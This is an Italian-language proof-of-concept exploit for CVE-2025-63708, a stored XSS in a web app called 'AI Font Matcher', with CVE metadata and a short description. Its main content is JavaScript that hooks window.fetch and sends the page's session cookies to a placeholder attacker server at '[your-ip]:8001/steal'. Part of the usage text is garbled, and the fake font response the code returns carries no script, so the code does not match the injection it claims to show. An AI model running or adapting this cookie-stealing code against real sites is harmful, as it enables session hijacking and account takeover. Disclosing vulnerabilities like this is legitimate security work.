
Proof-of-concept exploit per CVE-2025-63708, una vulnerabilità XSS memorizzata in AI Font Matcher. Dimostra il furto di cookie di sessione tramite nomi di font family non sanificati nelle risposte di fetch dei webfonts.
ID CVE: CVE-2025-63708
Assegnato: 11-12-2025
Tipo di problema: CWE-79 (Cross-Site Scripting)
Prodotto affetto: "AI Font Matcher" (pubblicato il 10-10-2025, nid=18425)
Pagina del prodotto: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
Data di scoperta: 11-10-2025
Ricercatore: Dylan Davis
L'applicazione elabora i dati provenienti da un fetch di webfonts senza sanificare i nomi delle famiglie di font. Un attaccante che controlla o intercetta quella risposta può iniettare JavaScript che viene eseguito nel contesto della pagina, consentendo il furto di cookie di sessione e l'acquisizione dell'account.
Questo PoC dimostra l'esecuzione di codice agganciando window.fetch e restituendo un payload controllato di Web Fonts.
poc.js).webfonts; osserva un alert(1).window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
const url = (typeof input === 'string') ? input : input?.url;
if (url && url.includes('webfonts')) {
// Esfiltra il cookie verso il tuo server
fetch('http://[your-ip]:8001/steal?cookie=' +
encodeURIComponent(document.cookie))
.catch(e => console.log('Esfiltrazione fallita:', e));
return new Response(JSON.stringify({
kind: "webfonts#webfontList",
items: [{ family: "Playfair Display", category: "serif" }]
}), {
status: 200,
headers: {'Content-Type': 'application/json'}
});
}
return window.__origFetch.apply(this, arguments);
};